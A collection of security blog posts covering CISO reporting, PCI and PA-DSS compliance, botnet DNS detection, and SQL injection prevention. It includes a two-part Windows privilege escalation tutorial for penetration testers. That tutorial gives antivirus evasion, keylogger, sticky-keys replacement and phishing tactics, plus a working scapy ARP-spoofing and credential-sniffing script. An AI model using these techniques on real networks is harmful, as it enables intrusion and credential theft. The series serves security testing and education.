
Where the CISO Reports

Since the role of the Chief Information Security Officer (CISO) and how he or she reports have a major impact on security and risk, I think it’s interesting to look at how different organizations have structured the position. That said, there is very little consistency other than a correlation with each industry vertical’s understanding of IT risk.

Within financial services organizations, the CISO (occasionally the top position is given to a Chief Security Officer (CSO) that owns both physical and IT security) often reports to the Chief Information Officer (CIO). However, at many large financial services organizations, the CISO or CSO reports outside of IT, often to the Chief Risk Officer or other C-level executive.

The CISO position within healthcare has been treated quite differently. Because of HIPAA, many organizations didn’t want to promote the security manager to the CISO position, so they gave their CIO the CISO title as well. There is often a Director or Manager of Information Security a few rungs down reporting to a lower-level manager.

Information security within retail is also quite different. With the focus on PCI, the CISO or director of information security is often tied to the PCI or compliance group. Within large retailers that have loss prevention or risk departments, the CISO sometimes reports through them.

Because of their historic focus on physical security, energy companies often have a CSO or CISO that owns both the organization’s IT and physical security. In some cases I’ve seen this position report to facilities, but usually it reports into operations, and occasionally it reports to the CIO.

The military often leads industry in its adoption of information security practices. One interesting change is that security teams have taken significant ownership of IT leadership. In the case of US Cyber Command, a separate group is being set up outside of IT reporting directly to the highest levels of government. I’m not sure how this change will find its way to the private sector, but it is a very interesting precedent that will likely have an impact on information security and the CISO.

In general, the more risk-sensitive the industry, the higher up CISOs will report, until they report entirely outside of IT. In many cases, regardless of where they fit in the reporting structure, the CISO will report regularly to the board about the state of initiatives, compliance, audits or assessments. With this type of visibility, I think it’s clear that the CISO will continue to rise in prominence, and the information security reporting structure will continue to evolve. However, it may take a compliance-related mandate within the lagging industry verticals for this to happen quickly.


Healthcare Solutions and PA-DSS Compliance (with a Deadline in July)

In a post that I wrote earlier, “The Far-Reaching Impact of the PCI DSS,” I mentioned the influence of the PCI DSS on industries other than retail and hospitality. I’d like to expand on that topic by taking a look at healthcare software and the Payment Application Data Security Standard (or PA-DSS, a standard within the broader PCI DSS).

Since the introduction of the PA-DSS, and the ‘retirement’ of the former standard (PABP), NetSPI has been constantly engaged with companies that suddenly have to address what was previously a voluntary standard and one that was considered relevant only by Point-Of-Sale (POS) vendors.

However, what has been pretty clear from the beginning is that PA-DSS is in no way limited to the retail checkout environment. As defined by the PCI SSC, the PA-DSS applies to applications that:

  • Store, process, or transmit cardholder data
  • Are sold, distributed, or licensed to third parties

It’s really pretty straightforward – if you are a software company and your product fits these two criteria, PA-DSS applies to you. That means that healthcare application companies whose products touch cardholder data now need to add PA-DSS to the list of standards they need to be concerned about. Also, I should mention that the deadline that VISA has set for PA-DSS compliance is July 2010.

Many integrated healthcare solutions are built to support a wide range of needs inside a complicated hospital or practice environment – managing workflow, interaction, and data sharing internally between departments as well as externally with patients, insurance companies, and, potentially, public health representatives.

Often these highly valuable (and highly intricate) systems were not built with a primary focus on financial transactions – they sprang from the needs of doctors, patients, and the medical system. The requirements involved with PA-DSS and the broader PCI DSS can be confusing and hard to translate for healthcare software companies that have certainly incorporated security and privacy into their products, but have traditionally focused on patient confidentiality rather than cardholder data protection.

Today, my recommendations for healthcare software companies would be:

  1. Rapidly determine if their solutions meet the criteria for PA-DSS and, if so,
  2. Quickly find a partner from the fairly small group of seasoned PA-QSAs that also has significant experience with both healthcare and enterprise-level applications (an even smaller group).

As the deadline approaches, addressing these two things is the first step in a process that really needs to be more holistic and take into account the full spectrum of security concerns that face the healthcare software community. That holistic view now includes validating against a standard that was not developed by a healthcare-centric entity, but rather by an organization that was created to ensure credit card security (regardless of the market or environment).

Understanding where and how the PA-DSS translates into their solutions is one of the challenges for software providers in the space, and there are few knowledgeable, experienced partners to turn to as July gets closer.


Beyond the PCI Audit: Helping Merchants and Service Providers as a Partner

At the PCI Community Meeting last month in Las Vegas, one thing was abundantly clear – merchants and service providers need help. The confusion that comes with a complicated, comprehensive security standard, coupled with governance that shifts back and forth between the PCI-SSC and the card brands, has created a situation that requires that a QSA be more than just an auditor for their clients.

Now, I should state that I’m a full supporter of the PCI SSC and the PCI DSS – I’m not here to bash the council or the brands. Security around cardholder data is something that really needed improvement (and continues to need improvement), and the PCI DSS is really just a codified set of best practices with a tight focus on cardholder data.

At the community meeting I noticed that a number of the attendees appeared frustrated by how many times a question to the SSC (or to the card brand representatives to the SSC) elicited a response of “That’s really a brand-specific question and will need to be asked to the individual brands directly.”  By this point most companies recognize that the PCI DSS is not the overall goal for their security strategy – its narrow focus ignores a great deal that organizations need to be concerned about in terms of information security. However, today many organizations still don’t realize that PCI isn’t even ‘complete’ in addressing credit card security – the brands may have important individual guidance that supersedes the PCI DSS.

Which brings me back to my initial statement – people need help and not just audits. The merchant and service provider community is looking for leadership and for partners to work with them to understand the unique and shifting landscape of compliance and security. This includes PCI, but it also includes the broader discussion of what the individual brands require outside of the PCI DSS and the impact of decisions on overall security.

The community expects and, truthfully, deserves this leadership. After all, we’re the experts and they are putting their trust in that expertise. Yes – passing your PCI audit is very important, but it isn’t the only thing that’s important, even within credit card security.


Botnet Detection and Dynamic DNS

The Internet is a vast and unforgiving wilderness; every day, some new monstrous beast rears its ugly head and threatens the hapless denizens of networks everywhere. The only thing standing between those Internet citizens and complete ownage is the security industry. This means that we have to adapt to the newest and biggest threats on the Internet. Recently, the industry has shown its vulnerability to a particularly nasty threat: botnets. This malware is dangerous because it is difficult to detect before some workstations start broadcasting administrator passwords, online credentials, or even credit card and social security numbers. What’s more, botnets can adapt to hide from common detection techniques and antivirus configurations. Prevention is, of course, the best answer, but it can’t be the only line of defense. Pfizer lost some serious credibility when its networks started uncontrollably spamming people with offers for Viagra (a product they make), and as recently as September it was revealed that over half of Fortune 100 companies had networks infected with a botnet called Mariposa. The problem isn’t a simple one.

More recent approaches to botnet detection have come in the form of network-based detection. Many botnets rely on dynamic DNS solutions to obfuscate data collection centers, and David Dagon wrote an interesting presentation on DNS-based detection of forming botnets. These dynamic DNS solutions tend to be abused by botnet owners, allowing them to hijack hundreds of third-level domains from dynamic DNS servers for use in controlling botnets or aggregating data. Fortunately, this means that the botnet will require a lot of DNS traffic during formation, and this footprint allows for easy isolation of the infected hosts before they transform into a rampaging swarm of zerglings and spew your data all across the Internet. It won’t save anyone from an already formed botnet, and it won’t prevent a distributed denial of service attack that originates externally, but it’s another layer of protection for internal data.
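To make the idea concrete, here is a minimal sketch of that kind of DNS-footprint detection in Python. It assumes a hypothetical query log with one lookup per line in the form "timestamp client_ip queried_name"; the dynamic DNS suffixes and the threshold are placeholder values you would tune for your own environment, not a reference to any particular product.

import collections

# Hypothetical log format: one lookup per line, "timestamp client_ip queried_name".
DYNDNS_SUFFIXES = (".no-ip.org", ".dyndns.org")  # example dynamic DNS suffixes
THRESHOLD = 50  # distinct dynamic DNS names per host before we flag it

def flag_suspicious_hosts(log_path):
    lookups = collections.defaultdict(set)
    with open(log_path) as log:
        for line in log:
            parts = line.split()
            if len(parts) < 3:
                continue  # skip malformed lines
            client_ip, name = parts[1], parts[2].lower()
            if name.endswith(DYNDNS_SUFFIXES):
                lookups[client_ip].add(name)
    # Hosts resolving an unusually large number of distinct dynamic DNS names
    # during botnet formation stand out from normal workstation behavior.
    return {ip: names for ip, names in lookups.items() if len(names) >= THRESHOLD}

if __name__ == "__main__":
    for ip, names in flag_suspicious_hosts("dns_queries.log").items():
        print(f"{ip}: {len(names)} distinct dynamic DNS lookups")

In practice you would feed this from resolver logs or passive DNS capture, but even crude counting like this surfaces hosts that are suddenly very interested in dynamic DNS.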


Preventing SQL Injection at the Database

SQL injection vulnerabilities are common out in the real world. We spend a lot of time and effort looking for SQL injection vulnerabilities in application code, a good and necessary practice. Application security, however, must be considered at every layer of the system. In fact, by using a good database and data access layer design, we can help eliminate the possibility of a SQL injection vulnerability.

True, the topic of database and data access layer design is expansive, including the use of service accounts and row-level authorization. But for now, here is a simple approach, built on two small requirements, to make sure that the database itself is doing its part to support a secure data access layer and to protect against SQL injection attacks.

These two requirements are:

1) All data access should occur via parameterized stored procedures.

2) Users should be limited to CONNECT and EXECUTE privileges.

By ensuring that all data access is via stored procedures, we can enforce the practice of parameterizing variables, thus eliminating the possibility of arbitrary SQL statements getting to our database. Of course, you must also make sure that your stored procedures are properly written and do not include insecure practices such as building dynamic SQL strings from user input and executing them with EXEC or sp_executesql.

By limiting users to CONNECT and EXECUTE privileges, we can limit the possibility of users executing random SQL statements. If they try to SELECT anything, for example, it will fail.
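For illustration, here is a minimal data access layer sketch in Python. It assumes SQL Server with the pyodbc driver, and the server name, the app_user account, and the dbo.GetOrdersByCustomer stored procedure are all hypothetical; the application account would be granted only CONNECT and EXECUTE as described above.

import pyodbc

# The application account holds only CONNECT and EXECUTE, so even a compromised
# connection cannot issue ad hoc SELECT, INSERT, or DDL statements.
CONN_STR = (
    "DRIVER={ODBC Driver 17 for SQL Server};"
    "SERVER=dbserver;DATABASE=SalesDB;"
    "UID=app_user;PWD=<password>"
)

def get_orders_by_customer(customer_id: int):
    conn = pyodbc.connect(CONN_STR)
    try:
        cursor = conn.cursor()
        # customer_id travels as a bound parameter to the stored procedure; it is
        # never concatenated into the SQL text, so it cannot alter the statement.
        cursor.execute("{CALL dbo.GetOrdersByCustomer(?)}", customer_id)
        return cursor.fetchall()
    finally:
        conn.close()

Because the caller can only execute procedures and every value travels as a bound parameter, there is no string concatenation left for an attacker to abuse.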


Are We Ready for a Security Software Assurance Program?

Integrating security checks and balances with your application development processes is certainly uncharted territory for many security professionals. Why is this so? With the multitude of benefits that custom-developed applications bring to an organization comes a multitude of risks, namely that sensitive, regulated, and confidential data is being stored, processed, transmitted, and exchanged inside and outside the boundaries of the organization. Why don’t we have a better handle on these risks? I think that we as security professionals have missed an opportunity to embed security in the development process. Let’s begin to understand why this is and how we can go about changing it.

Step back a few years to when your security program was just getting off the ground. Developed applications were supposed to just work right. Applications either met design specs or they didn’t; wasn’t it that simple? Why did security need to be involved? Back in the day, applications were always quarantined behind the firewall, and business partners only received data via a data exchange solution. Out of scope for security, right?

Now, fast forward from the days of firewalls and anti-virus concerns and take notice: everyone who has any reason to access your data can, from anywhere, anytime. Sure, you’re protecting it with a strong password, maybe even two-factor authentication, a VPN, or rock-solid acceptance and confidentiality agreements. You’re conducting vulnerability scans on the DMZ nightly, right? Would you ever dream of scanning that application nightly? In production? Are you crazy? That might cause an outage. But hold on, and consider what else you may be missing.

Good application security practices require security checks and balances throughout the entire lifecycle, not just a security assessment at the end of the line. These checks and balances include things like secure coding standards, developer training, well-defined security requirements, security code reviews, the use of sanitized test data, separation of duties, security testing during development checkpoints, security use case testing, and penetration testing.

So, if that’s where we need to be, how do we get there? Is the answer Security Software Assurance Programs? They sound like a great concept: prescriptive programs that cover application security from A to Z; all you need to do is implement one and watch the needle on the risk meter drop. Let’s get real. Budgets are tight, development timelines are tight, and security programs are underfunded. Can you realistically launch a massive and invasive security program? Once again, I think we missed an opportunity somewhere between the 1990s and now to ensure that security and application development work in tandem.

So what do you do now? I suggest you think big, but start smart. Pick two or three obvious pain points and start there, e.g., with more testing or better requirements. If there is one thing to get in place sooner rather than later, it is training your development leads (literally, scare the daylights out of them). Keep in mind, you will need to turn this into a full-on program, so begin working towards it, but start by re-acquainting yourself with your developers and providing them with some high-value wins. Help them find security issues in-house before someone else does.


Windows Privilege Escalation Part 2: Domain Admin Privileges

Introduction

This is the second part of a two-part series that focuses on Windows privilege escalation. The previous post (Part 1) provided an overview of 10 vectors that could be used to obtain local SYSTEM and administrative privileges from an unprivileged user account. This post focuses on obtaining domain administrative privileges from a local administrator or domain user account.

Escalation Techniques

Once the initial steps have been taken to obtain local administrative access on a Windows operating system, the natural next steps are to gain domain user and domain administrative privileges. Many of the methods for gaining domain administrative privileges are the same as or similar to those used to gain local administrative privileges, so don’t forget to try out some of the techniques from the last post. Using the escalation vectors listed below, penetration testers often gain unauthorized access to all kinds of things: applications, systems, and everyone’s favorite, domain administrator accounts.

  1. Crack Local LM Password Hashes
    A long time ago, in a LAN far away, there lived a strong password stored as an LM hash. The penetration testers of the LAN tried brute-force and dictionary attacks, but it took weeks to crack the single LM password hash. The IT administrators were pleased and felt there was security across the LAN. I think we’ve all heard that bedtime story before, and it’s less true now than ever. Using precomputed rainbow tables, LM password hashes can be cracked in a few minutes instead of a few weeks, allowing penetration testers to quickly crack local, service, and in some cases domain accounts. Service and domain accounts can be especially helpful for the reasons below.

    Service Accounts
    Local service accounts are commonly installed using the same passwords across an entire environment. To make matters worse (or better, depending on your perspective), many of them allow interactive login, and in extreme cases they are installed on domain controllers with Domain Admin privileges. Service accounts may seem trivial at first glance, but make sure to give them the attention they deserve; it usually pays off in the end.

    Domain Accounts
    Domain accounts are nice to have for a number of reasons. First, they typically provide a penetration tester with enough privileges on the domain to look up other user accounts to target in future attacks, e.g., domain administrators. Second, they typically provide testers with access to shares that haven’t been locked down properly. Finally, they provide a means for logging into other systems such as domain controllers and member servers. To be fair, most small to mid-sized companies are getting better at disabling LM hash storage and keeping only the stronger NT hashes, but it seems to be something that a lot of large companies are still struggling with. So don’t forget to dump and crack those hashes. It isn’t always that easy, but sometimes it is.
  2. Impersonate Users with Pass-The-Hash Toolkit and Incognito
    Have you ever wanted to be someone else? Well, now you can. With local administrator rights to a system, you can impersonate any logged-on user with the Pass-The-Hash Toolkit or Incognito. Both tools can list logged-on users and impersonate them on the network by manipulating LSA (Local Security Authority) logon sessions. In most cases this means domain user or administrator access. I know it’s exciting, but keep in mind that anti-virus and anti-malware products typically protect LSA sessions from manipulation, so they must be disabled before the tools can be used. Or, for the more ambitious, modify the source code and recompile each program to avoid detection.
  3. Install a Keylogger
    Installing key loggers on systems is a time-honored tradition practiced by hackers for generations. They can be a great vector for gathering passwords to systems, applications, and network devices. Historically, they have been pretty easy to create and conceal. However, I still recommend disabling anti-virus services, or at least creating an anti-virus exception for the relevant file types (for example, *.exe files), before installing a key logger.

    Key loggers are relatively easy to program and obfuscate, but if you’re not up to the task of making your own, there are plenty of open-source and commercial options available on the Internet. Just keep in mind that most installations require local administrative access.

    Happy logging!

  4. Install a Sniffer on the Localhost
    Installing a network traffic sniffer is another vector of attack that has been practiced since the dawn of the Internet. As you might expect, sniffers can also be a great vector for gathering passwords to systems, applications, and network devices. Unfortunately, this is another one that will require local administrative access. It’s needed to install the WinPcap driver used to perform promiscuous sniffing of network traffic. Typically, the only traffic sniffed on today’s networks is broadcast traffic and traffic flowing to and from the localhost. Apparently, somewhere along the line most companies figured out that using routers and switches was a better idea than daisy-chaining hubs. Even with this limitation, sniffing traffic on the right server can yield great results, especially with the popularity of unencrypted web applications that authenticate to Active Directory. There are a number of great open-source and commercial sniffing tools out there. If you don’t mind using a GUI, then I recommend the full WinPcap install and Wireshark. Wireshark is available for a number of platforms, has lots of great options, and is free. Alternatively, if you prefer a stealthier method of installation, I recommend using WinDump (the Windows port of tcpdump) and the WinPcap distribution that comes with the Windows Nmap zip package, because it can all be installed silently without a GUI.
  5. Sniff from Network Devices

    A few of the most common vectors of attack overlooked by penetration testers are routers and switches. Typically, both device types can copy network traffic and direct it anywhere on the network for sniffing. In some cases testers can even monitor and view traffic right on the device itself. Oddly enough, many companies don’t change the default passwords and SNMP strings that protect the management of such devices. Unfortunately for penetration testers, some companies only allow read access to device configurations, but have no fear. Many of the same devices will accept and reply to SNMP queries for the TFTP image paths. Most TFTP servers don’t use authentication, which means the image can be downloaded and the device passwords can be read or cracked to gain full access.

  6. Perform Man in the Middle (MITM) Attacks
    Ok, you caught me, I lied about only being able to sniff network traffic coming to and from the localhost. However, it was for good reason. I wanted to make the distinct point that MITM attacks are typically required to sniff network traffic flowing between remote systems on a LAN. One of the easiest ways to conduct MITM attacks is ARP spoofing. It’s a simple attack, there are lots of free tools that support it, and many companies still don’t protect against it. Explaining how ARP spoofing works is beyond the scope of this article, but I strongly suggest reading up on it if you are not familiar (a minimal scapy sketch of ARP spoofing and credential sniffing follows this list). There are a lot of ARP spoofing tools out there, but I don’t think I’m alone in saying that Cain & Abel is my favorite. It makes initiating an ARP spoofing attack as easy as using Notepad. In addition, it also gathers passwords for at least 20 different applications and protocols while sniffing. The fun doesn’t stop there; it also intercepts HTTPS, RDP, and FTPS communications, making it extremely valuable even against encrypted communications. In some cases MITM attacks can be more effective than all of the other escalation vectors. It can take time to sniff the right password, but on the bright side it can be done while you’re conducting other attacks. Hooray for multi-tasking!
  7. Attack Domain Controllers Directly

    If domain controllers are in scope for your penetration test, then I recommend starting there. Gaining almost any level of user access on a domain controller typically leads to domain administrator access. If SYSTEM-level access is not immediately obtained via missing patches, weak configuration, or coding issues, then (in most cases) using the other vectors of attacks listed in Parts 1 and 2 of this series should allow you to escalate your privileges.

    Remember, SYSTEM-level access on a domain controller is equivalent to domain administrator access. SYSTEM access can be easily leveraged by penetration testers to create their own domain administrator account.

  8. Online Resources
    Never underestimate the power of public information. Public registrars are a great place to find company contacts, business partners, IP addresses, and company websites, all of which can lead to valuable information such as internal procedures, configuration files, patch levels, and passwords. There have been many occasions when I’ve found internal installation procedures containing passwords on company websites, forums, and blogs. Once passwords have been found, use externally accessible login interfaces to gain access to systems and sensitive information.
  9. Buy Used Computer Equipment
    Going once, going twice, sold to the highest bidder. Sensitive information like social security numbers, credit card numbers, and account passwords is being sold every day in a neighborhood near you. Companies sell their used POS terminals, workstations, servers, and network equipment all the time. However, what many of them don’t do is take the time to securely wipe the disks. As a result, sensitive data is flying around eBay, Craigslist, and your local auction house. I’ve personally seen POS terminals storing thousands of card numbers in clear text. Even worse, I’ve seen firewalls with configurations that allow the buyer direct VPN access to the corporate network of the company that sold the devices.
  10. Social Engineering
    Sometimes the easiest way to gain domain administrative privileges is to never touch a computer. If you’re part of the security community, you already know what social engineering is and what the common vectors are. However, this may be a new concept for some people, so I’ll provide a brief overview. In a nutshell, social engineering is the process of manipulating people into providing information or performing actions. Although there are many types of social engineering attacks, there are three primary vectors: in person, phone-based, and the most common, email phishing. At this point you may still be wondering how this is going to result in domain administrator access, so I’ve provided an example for each vector below.

    In Person
    Who wants to play dress up? One of the easiest ways to gain access to systems and networks is to pose as an IT vendor or internal IT staff member. Showing up unannounced can be tricky, but with a good back-story the IT director will walk you right into the data center. If you’re lucky the employees will even bring you coffee. With physical access to the systems, the network is yours for the taking. Have fun installing key loggers, backdoors, and wireless access points, and adding your own accounts for future access. However, keep in mind that there is always a small chance that you’ll end up in a choke hold or handcuffed by an excitable security guard, so I recommend getting a formal authorization letter before going onsite. Understandably, not everyone is keen on lying to people’s faces. If that’s the case, I recommend doing it via the phone or email instead.

    Over the Phone
    There are a number of proven techniques for conducting social engineering attacks over the phone, but depending on your goal I recommend one of two approaches. If the goal is to get a large volume of passwords and install backdoors, then target employees directly. Even if the company provides security training on an annual basis, most people tend to forget the IT procedures. If the goal is to target specific accounts, then calling the IT support line is the way to go. Most support teams have some type of identification procedure, but in most cases a sob story and an employee number will get you access to the account.

    Email Phishing
    The superstar of the social engineering world is definitely email phishing. It is the most widely used vector for one very good reason: it’s easy to do. Attackers can set up a fake company survey on the Internet and send phishing emails to solicit passwords with very little effort. In my experience phishing attacks have approximately an 80% success rate, and in some cases the passwords can be gathered within minutes of sending the first phishing email. Similar to phone-based attacks, targets can vary from every employee in a company to strategic individuals such as CEOs. Technical vulnerabilities can present a real threat to organizations, but when it comes to getting the best results for your energy, social engineering wins out every time. However, keep in mind that social engineering tests are not a substitute for technical testing and should be done in conjunction with traditional assessments.
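For those who want to see what vectors 4 and 6 look like in practice, here is a minimal ARP spoofing and credential sniffing sketch using Python and scapy. The victim and gateway addresses are hypothetical placeholders, it assumes you are running with root privileges on an authorized test network with IP forwarding enabled, and it is only a sketch of the technique, not a replacement for a tool like Cain & Abel.

from scapy.all import ARP, Raw, TCP, getmacbyip, send, sniff

VICTIM_IP = "192.168.1.50"   # hypothetical victim address
GATEWAY_IP = "192.168.1.1"   # hypothetical gateway address

def poison():
    """Send spoofed ARP replies so both ends map the other's IP to our MAC."""
    victim_mac = getmacbyip(VICTIM_IP)
    gateway_mac = getmacbyip(GATEWAY_IP)
    # op=2 is an ARP "is-at" reply; hwsrc defaults to our interface's MAC.
    send(ARP(op=2, pdst=VICTIM_IP, hwdst=victim_mac, psrc=GATEWAY_IP), verbose=False)
    send(ARP(op=2, pdst=GATEWAY_IP, hwdst=gateway_mac, psrc=VICTIM_IP), verbose=False)

def credential_filter(pkt):
    """Crude check for clear-text HTTP Basic auth or form logins in transit."""
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = bytes(pkt[Raw].load)
        if b"Authorization: Basic" in payload or b"password=" in payload:
            print(payload[:200])

if __name__ == "__main__":
    # A real run would re-poison every few seconds in a loop or background
    # thread; a single round is enough to demonstrate the idea here.
    poison()
    sniff(filter=f"host {VICTIM_IP}", prn=credential_filter, timeout=60)

With IP forwarding enabled the victim's traffic keeps flowing through your host, so the sniff callback sees it in both directions while the session stays up.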

Conclusion

Obtaining domain administrative privileges doesn’t always require super hacker tools, but sometimes they do help. Also, when attacking the beast, go for the heart. Translation: when domain controllers are in scope, attack them first to save a lot of time. Until next time, keep shining light into the dark places. – SPS

Tool and Command References


Windows Privilege Escalation Part 1: Local Administrator Privileges

The process of stealing another Windows user’s identity may seem like black magic to some people, but in reality any user who understands how Windows works can pull it off. This is the first of two blog entries giving an overview of privilege escalation techniques that prove that fact. Part 1 (this entry) discusses obtaining local SYSTEM and administrative privileges from an unprivileged user account, and Part 2 will focus on obtaining domain administrative privileges from local administrator or domain user accounts.

Escalation Techniques

Weak configurations and missing patches often lead to local user and service account access. Sometimes these accounts can be used to access sensitive information directly, but usually access to the affected systems and connected networks doesn’t stop there. Using the 10 escalation vectors listed below, penetration testers can often gain unauthorized access to databases, network devices, and other systems on the network.

  1. Clear Text Passwords Stored in Files:  Never underestimate the efficiency of IT administrators. In their quest to play more Halo, most administrators have automated a large number of their processes and made their systems as homogeneous as possible. This sounds like a dream come true for administrators, but it is just as convenient for attackers. The scripts used to automate processes and connect to databases often include clear text user names and passwords that can be used to gain unauthorized access to systems and applications. Also, because most of their systems are built from the same image, finding a security issue on one system is like finding it on all of them. So, while doing penetration tests, take the time to pick the low-hanging fruit. Checking local files for sensitive credentials can be one of the easiest ways to escalate privileges (a minimal search sketch follows this list). Personally, I recommend using Spider 2008 for the task. It is a great open-source tool created by the folks at Cornell University that accepts custom regexes and can be used to search for sensitive information on systems, shares, and websites.
  2. Clear Text Passwords Stored in the Registry:  The registry is a hidden treasure chest of passwords and network paths. Application developers and system administrators leverage it for all kinds of interesting things, but they don’t always use encryption when they should. So spend some time browsing for passwords and network paths that could lead to secret stashes of sensitive data. I encourage people to write their own scripts or use an automated tool to search the registry for sensitive information, but feel free to use the find function in regedit if your fingers need a little exercise.
  3. Write Access to the System32 Directory:  By default, unprivileged users do not have write access to the system32 directory in Windows operating systems. However, many older applications and misguided system administrators change the permissions to avoid access errors and ensure smooth operations. Unfortunately, the result of their good intentions also allows penetration testers to avoid access errors and ensure smooth privilege escalation to local SYSTEM. Specifically, accessibility programs such as system32\sethc.exe (Sticky Keys) and system32\utilman.exe (Windows Utility Manager) can be used to gain SYSTEM-level access by replacing their executables with cmd.exe. This works because Windows doesn’t perform any file integrity checks on those files prior to login. As a result, users can create a local administrator account and disable anti-virus, among many other creative possibilities. This is one of my favorites. I hope you enjoy it as much as I have.
  4. Write Access to the All Users Startup Folder:  Every user on a Windows operating system has his or her own Windows startup folder that is used to start programs just for them when they log on. As luck would have it, there is also a Windows startup folder that contains programs that run for (you guessed it) ALL users when they log on. If unprivileged users have the ability to write to that directory, they can escalate their privileges on the local system and potentially the network by placing an evil executable or script in the directory and tricking a trusting user into logging into their machine. If your penetration test allows for a little bit of social engineering, I recommend calling up the help desk and asking them to sign into your system in order to help with a random computer issue. The help desk team usually has the privileges to add, edit, and remove local and domain users.
  5. Insecurely Registered Executables: When a program is installed as a Windows service or logon application, it is required to register with Windows by supplying a path to the program’s executable. If it is not registered securely, penetration testers may be able to escalate their privileges on the system by running commands under the context of the service user. Specifically, if a registered path contains spaces and is not enclosed in quotes, penetration testers may be able to execute their own program based on the registered executable path.

    Insecurely registered executables can be an easy, low-impact way to gain SYSTEM-level access on a system. Although insecurely registered executables can be identified manually, I recommend using some of the automated tools available for free on the Internet (a minimal check for unquoted service paths also follows this list).
  6. Windows Services Running as SYSTEM:  Lots of services run as SYSTEM, but not all of them protect their files and registry keys with strong access controls. In some cases SYSTEM-level access can be obtained by overwriting files and registry keys related to SYSTEM services. For example, overwrite an executable used by a SYSTEM service with cmd.exe. If the overwrite is successful, then the next time the service calls the executable, a SYSTEM console will open. Modifying configuration files and performing DLL injection have also proven to be effective techniques. No super-secret tools are needed for this vector of attack; Windows Explorer or a command console should do.
  7. Weak Application Configurations: I’ve found weak application configurations during every penetration test I’ve ever done, and in many cases they can be leveraged to gain SYSTEM-level access. Even in an age of application hardening guides and industry compliance requirements, I regularly find applications like IIS and MSSQL running as SYSTEM instead of a least privilege service account.

    I recommend doing some research on the applications installed on your target systems to determine how best to leverage their configurations.
  8. Windows At Command: I know this is an oldie, but it’s still worth mentioning, because oddly enough there are some environments out there running unpatched versions of WinNT and Windows 2000. So, for those who have not used this technique before, it may still be useful. The “AT” command is a tool that is used to schedule tasks in Windows. By default, in earlier versions of the Windows operating system the “AT” command ran tasks as SYSTEM. As a result, users can obtain a SYSTEM console by scheduling cmd.exe as a task.
  9. Install a User-Defined Service: In some cases Windows users may have excessive rights that allow them to create services on the system using the Instsrv.exe and Srvany.exe tools that come with the Windows NT resource kit. Instsrv.exe is used to install a program as a service, and Srvany.exe is used to run the program as a service. By default, the services installed with instsrv.exe should be configured to automatically start at boot time. However, you can also use the sc.exe command to ensure that it is configured how you want it. Either way, a restart may be required depending on your existing privileges. I’ve personally seen users in the “Power Users” group with the ability to install their own services, but it may be a coincidence. I recommend creating a Metasploit binary that adds a local administrator to the system, and using it to create the service. It’s easy, and the new administrator account can be used to sign in via remote desktop. However, if that’s not your cup of tea, feel free to use your favorite payloads.
  10. Local and Remote Exploits:  Managing and distributing patches for third-party software seem to be among the greatest challenges facing IT today. This is bad news for IT, but good news for penetration testers, because it leaves vectors of attack open. Exploiting local and remote vulnerabilities can provide SYSTEM-level access with very little effort, and—with a little luck—domain administrator access. However, they can have some negative impacts on sensitive systems, like crashing them. If that is not a problem in the environment you’re working in, then more power to you. However, if you’re working with people who don’t like their systems to crash unexpectedly, then take the time to understand the exploits and avoid using the ones that have a history of negative effects. There are a number of great open-source and commercial toolsets available for exploiting known software vulnerabilities. However, the frontrunners seem to be Metasploit, Canvas, and Core Impact. They all have a variety of options and exploits, but I recommend using the one that fits your immediate needs and budget.
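As promised in vector 1, here is a minimal file-search sketch in Python. The file extensions and regular expressions are placeholder examples, not the tuned signature set that a tool like Spider 2008 ships with, and the starting path is just an illustration.

import os
import re

# Placeholder patterns and extensions; a real engagement would use a much
# larger, tuned set of signatures.
PATTERNS = [
    re.compile(rb"password\s*[=:]\s*\S+", re.IGNORECASE),
    re.compile(rb"connectionstring\s*=", re.IGNORECASE),
]
EXTENSIONS = (".bat", ".cmd", ".vbs", ".ps1", ".ini", ".config", ".xml", ".txt")

def search_for_credentials(root):
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as handle:
                    data = handle.read(1024 * 1024)  # first 1 MB is plenty for scripts
            except OSError:
                continue  # unreadable file; move on
            if any(pattern.search(data) for pattern in PATTERNS):
                print(f"possible credential material in {path}")

if __name__ == "__main__":
    search_for_credentials("C:\\")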
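And for vector 5, here is a minimal check for insecurely registered (unquoted) service paths using Python's built-in winreg module. It is only a rough heuristic sketch, not one of the automated tools mentioned above, and it merely flags candidates; you would still need to confirm that you can actually write to one of the intermediate directories.

import winreg

SERVICES = r"SYSTEM\CurrentControlSet\Services"

def find_unquoted_service_paths():
    services_key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SERVICES)
    index = 0
    while True:
        try:
            name = winreg.EnumKey(services_key, index)
        except OSError:
            break  # no more subkeys
        index += 1
        try:
            with winreg.OpenKey(services_key, name) as service:
                image_path, _ = winreg.QueryValueEx(service, "ImagePath")
        except OSError:
            continue  # service has no ImagePath value
        path = str(image_path).strip()
        lowered = path.lower()
        # Quoted paths and paths without a space before the executable are fine;
        # an unquoted "C:\Program Files\Foo\svc.exe" style path is a candidate.
        if not path or path.startswith('"') or ".exe" not in lowered:
            continue
        if " " in lowered.split(".exe", 1)[0]:
            print(f"{name}: {path}")

if __name__ == "__main__":
    find_unquoted_service_paths()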

Conclusion

Usually, it doesn’t require super hack tools or a degree in wizardry to perform local privilege escalation as an unprivileged user. What it does require is enough understanding of how Windows works to use it against itself. Until next time, keep shining light into the dark places. – SPS

Tool and Command References


Mergers & Acquisitions in the Information Security Field

The news about the sale of the VeriSign consulting team to AT&T suggests that there will be many similar transactions in the near term within the information security market. The investment being made in this market is great, but based on previous experience, a positive outcome is less than certain. From my point of view there have been three stages of roll-up/investment in the market, and each has had limited success.

The first stage included some winners, like the VeriSign IPO, and some less successful acquisitions, like The Wheel Group with NetRanger and NetSonar. The acquisitions continued through the end of the Internet boom, with Symantec leading the charge with acquisitions ranging from Raptor/Axent to Riptech. Overall, the outcome was marginal. Many of the purchases were product-oriented, and most of the products are now gone. However, the managed services organizations like Riptech and the independent spin-off of Secure Computing’s consulting team (Guardent) lived on to do fairly well.

The second stage started with the acquisition of Guardent and was followed by similar transactions with Foundstone and @Stake. The NetSPI team had looked at these firms as the industry leaders to be emulated; however, the rumor was that these sales were driven by the investment bankers’ fears of a market downturn (which turned out to be correct). There were other purchases around this time that also fit into a similar category, like BT’s purchase of Counterpane.

